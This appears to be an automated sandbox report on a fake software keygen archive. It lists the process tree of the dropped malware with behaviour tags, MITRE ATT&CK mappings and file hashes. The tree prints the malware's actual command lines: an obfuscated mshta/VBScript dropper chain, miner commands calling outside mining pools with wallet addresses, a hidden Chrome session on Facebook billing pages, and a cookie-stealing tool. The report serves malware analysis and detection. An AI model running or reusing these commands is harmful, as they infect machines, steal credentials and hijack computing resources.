                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1448,10729094028814062731,386572308178372346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1444 /prefetch:8
                                                                                                                                      2⤵
                                                                                                                                        PID:4780
                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                      1⤵
                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                      • Modifies registry class
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:392
                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                        2⤵
                                                                                                                                        • Checks processor information in registry
                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                        • Modifies registry class
                                                                                                                                        PID:3148
                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                        2⤵
                                                                                                                                        • Drops file in System32 directory
                                                                                                                                        • Checks processor information in registry
                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                        • Modifies registry class
                                                                                                                                        PID:4908
                                                                                                                                    • C:\Windows\System32\rundll32.exe
                                                                                                                                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                      1⤵
                                                                                                                                        PID:2268
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp2_Pixillion_Bildkonverter_2_serial_keygen.zip\Pixillion_Bildkonverter_2_serial_keygen.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Temp2_Pixillion_Bildkonverter_2_serial_keygen.zip\Pixillion_Bildkonverter_2_serial_keygen.exe"
                                                                                                                                        1⤵
                                                                                                                                          PID:3236
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                                                                                                                            2⤵
                                                                                                                                              PID:4904
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                keygen-pr.exe -p83fsase3Ge
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:4840
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                                                                                                                                                  4⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                  PID:208
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                                                    5⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:4532
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                                keygen-step-1.exe
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:4272
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe
                                                                                                                                                keygen-step-5.exe
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:4308
                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                  "C:\Windows\System32\mshta.exe" VbSCriPT: CLOSE ( CrEatEObJeCT ( "wSCRIPT.sHEll" ). RUN ( "Cmd.ExE /q /C tYPE ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" > uxQGnaD~R.exe && sTART uxQGnaD~R.exe -Po2lHh1jSzwWJO1z8Cc3l9nnS3~TMyA & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"") do taskkill -f /IM ""%~NXM"" > nUL " , 0 ) )
                                                                                                                                                  4⤵
                                                                                                                                                    PID:4560
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /q /C tYPE "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" > uxQGnaD~R.exe && sTART uxQGnaD~R.exe -Po2lHh1jSzwWJO1z8Cc3l9nnS3~TMyA & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe") do taskkill -f /IM "%~NXM" > nUL
                                                                                                                                                      5⤵
                                                                                                                                                        PID:2860
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\uxQGnaD~R.exe
                                                                                                                                                          uxQGnaD~R.exe -Po2lHh1jSzwWJO1z8Cc3l9nnS3~TMyA
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:4892
                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                            "C:\Windows\System32\mshta.exe" VbSCriPT: CLOSE ( CrEatEObJeCT ( "wSCRIPT.sHEll" ). RUN ( "Cmd.ExE /q /C tYPE ""C:\Users\Admin\AppData\Local\Temp\uxQGnaD~R.exe"" > uxQGnaD~R.exe && sTART uxQGnaD~R.exe -Po2lHh1jSzwWJO1z8Cc3l9nnS3~TMyA & If ""-Po2lHh1jSzwWJO1z8Cc3l9nnS3~TMyA "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\uxQGnaD~R.exe"") do taskkill -f /IM ""%~NXM"" > nUL " , 0 ) )
                                                                                                                                                            7⤵
                                                                                                                                                              PID:4188
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /q /C tYPE "C:\Users\Admin\AppData\Local\Temp\uxQGnaD~R.exe" > uxQGnaD~R.exe && sTART uxQGnaD~R.exe -Po2lHh1jSzwWJO1z8Cc3l9nnS3~TMyA & If "-Po2lHh1jSzwWJO1z8Cc3l9nnS3~TMyA " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\uxQGnaD~R.exe") do taskkill -f /IM "%~NXM" > nUL
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:2580
                                                                                                                                                              • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                "C:\Windows\System32\regsvr32.exe" /s .\n~8Q.O -U
                                                                                                                                                                7⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                                                PID:3948
                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                              taskkill -f /IM "keygen-step-5.exe"
                                                                                                                                                              6⤵
                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:5100
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                                        keygen-step-2.exe
                                                                                                                                                        3⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                        PID:4996
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\F33A.tmp.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\F33A.tmp.exe"
                                                                                                                                                          4⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:2164
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\F33A.tmp.exe"
                                                                                                                                                            5⤵
                                                                                                                                                              PID:4740
                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                6⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                PID:4936
                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                timeout /T 10 /NOBREAK
                                                                                                                                                                6⤵
                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                PID:1452
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                                                                                                                                            4⤵
                                                                                                                                                              PID:4648
                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                ping 127.0.0.1
                                                                                                                                                                5⤵
                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                PID:4696
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                                                                                                                                            keygen-step-3.exe
                                                                                                                                                            3⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:4872
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                                                                                                                                              4⤵
                                                                                                                                                                PID:4884
                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                  ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                  PID:4636
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                                                                                                                                              keygen-step-4.exe
                                                                                                                                                              3⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:4736
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\asdw.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\asdw.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                PID:4132
                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:2392
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:1340
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\FCEF.tmp.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\FCEF.tmp.exe"
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  PID:4896
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\FCEF.tmp.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\FCEF.tmp.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    PID:4272
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\FF51.tmp.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\FF51.tmp.exe"
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:4936
                                                                                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                                                                                      -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w1689 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                      PID:4592
                                                                                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                                                                                      -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w16490@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:5084
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:3872
                                                                                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                          ping 127.0.0.1
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                          PID:2596
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Drops Chrome extension
                                                                                                                                                                      PID:2308
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:3380
                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                            taskkill /f /im chrome.exe
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                            PID:3020
                                                                                                                                                                        • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                          xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                          PID:2444
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                          PID:4956
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff9d0da4f50,0x7ff9d0da4f60,0x7ff9d0da4f70
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:4588
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1728,6464423839622796594,11337024795131023432,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1800 /prefetch:8
                                                                                                                                                                              6⤵
                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                              PID:4896
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1728,6464423839622796594,11337024795131023432,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2212 /prefetch:8
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:4140
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1728,6464423839622796594,11337024795131023432,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1752 /prefetch:2
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:2592
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,6464423839622796594,11337024795131023432,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2740 /prefetch:1
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:4352
                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,6464423839622796594,11337024795131023432,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2732 /prefetch:1
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:4204
                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,6464423839622796594,11337024795131023432,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:3328
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,6464423839622796594,11337024795131023432,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3120 /prefetch:1
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:3996
                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,6464423839622796594,11337024795131023432,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:2360
                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,6464423839622796594,11337024795131023432,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3648 /prefetch:1
                                                                                                                                                                                            6⤵
                                                                                                                                                                                              PID:1008
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\md4_4igk.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md4_4igk.exe"
                                                                                                                                                                                          4⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                          PID:188
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
                                                                                                                                                                                          4⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:900
                                                                                                                                                                                          • C:\ProgramData\6770221.exe
                                                                                                                                                                                            "C:\ProgramData\6770221.exe"
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            PID:200
                                                                                                                                                                                          • C:\ProgramData\538996.exe
                                                                                                                                                                                            "C:\ProgramData\538996.exe"
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                            PID:4948
                                                                                                                                                                                            • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                                              "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                                                              6⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              PID:4864
                                                                                                                                                                                          • C:\ProgramData\2121333.exe
                                                                                                                                                                                            "C:\ProgramData\2121333.exe"
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                            PID:4144
                                                                                                                                                                                            • C:\ProgramData\2121333.exe
                                                                                                                                                                                              "{path}"
                                                                                                                                                                                              6⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              PID:3772
                                                                                                                                                                                          • C:\ProgramData\3984593.exe
                                                                                                                                                                                            "C:\ProgramData\3984593.exe"
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            PID:4764
                                                                                                                                                                                          • C:\ProgramData\3179080.exe
                                                                                                                                                                                            "C:\ProgramData\3179080.exe"
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            PID:2600
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
                                                                                                                                                                                          4⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                          PID:4512
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:3992
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            PID:4600
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            PID:1280
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            PID:4896

                                                                                                                                                                                  Network

                                                                                                                                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                  Persistence

                                                                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                                                                  1
                                                                                                                                                                                  T1060

                                                                                                                                                                                  Defense Evasion

                                                                                                                                                                                  Modify Registry

                                                                                                                                                                                  2
                                                                                                                                                                                  T1112

                                                                                                                                                                                  Install Root Certificate

                                                                                                                                                                                  1
                                                                                                                                                                                  T1130

                                                                                                                                                                                  Credential Access

                                                                                                                                                                                  Credentials in Files

                                                                                                                                                                                  5
                                                                                                                                                                                  T1081

                                                                                                                                                                                  Discovery

                                                                                                                                                                                  Query Registry

                                                                                                                                                                                  3
                                                                                                                                                                                  T1012

                                                                                                                                                                                  System Information Discovery

                                                                                                                                                                                  4
                                                                                                                                                                                  T1082

                                                                                                                                                                                  Remote System Discovery

                                                                                                                                                                                  1
                                                                                                                                                                                  T1018

                                                                                                                                                                                  Collection

                                                                                                                                                                                  Data from Local System

                                                                                                                                                                                  5
                                                                                                                                                                                  T1005

                                                                                                                                                                                  Command and Control

                                                                                                                                                                                  Web Service

                                                                                                                                                                                  1
                                                                                                                                                                                  T1102

                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                  Downloads

                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                                                    MD5

                                                                                                                                                                                    7734ead5ccbeab590c403675551e7cfe

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    fea566ef88abc8d99ad25e0a4d300a84f6f42947

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    a1d9386c1223a90e7d48bdd3ff783e68e5c229d65dd9a347a32598372d8d0347

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    1df6b89ce7131d899ae62d062ecd2f83d4de1ba436bec695aa7f86e27c04aaa2ccafb2f9482c7a5f02a1c317c64fc2854af407d26fa62afbe4f17d0d35cfcd04

                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat
                                                                                                                                                                                    MD5

                                                                                                                                                                                    39f80c4d452a26def7a2d05f32a74e02

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    de6ef8e49e7725f627b1d748d7138c226bff75e1

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    f8d3c7043a3308cc1dedcf76bc0cd484df93822a7e3edddcab1595bb4959e582

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    97f6af2ca63a6784b9d63d996d68cec36b7eca8a39a85ea6ef3e3d540594944a7539266fec15fa4843ec1cd87d9523a723cedf00b6feaa5cc666b99ae67adf56

                                                                                                                                                                                  • \??\pipe\crashpad_4952_YDPJBJQZCRPNUYMQ
                                                                                                                                                                                    MD5

                                                                                                                                                                                    d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                  • \??\pipe\crashpad_808_SIHADAOSRVBNMSDY
                                                                                                                                                                                    MD5

                                                                                                                                                                                    d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                    SHA256

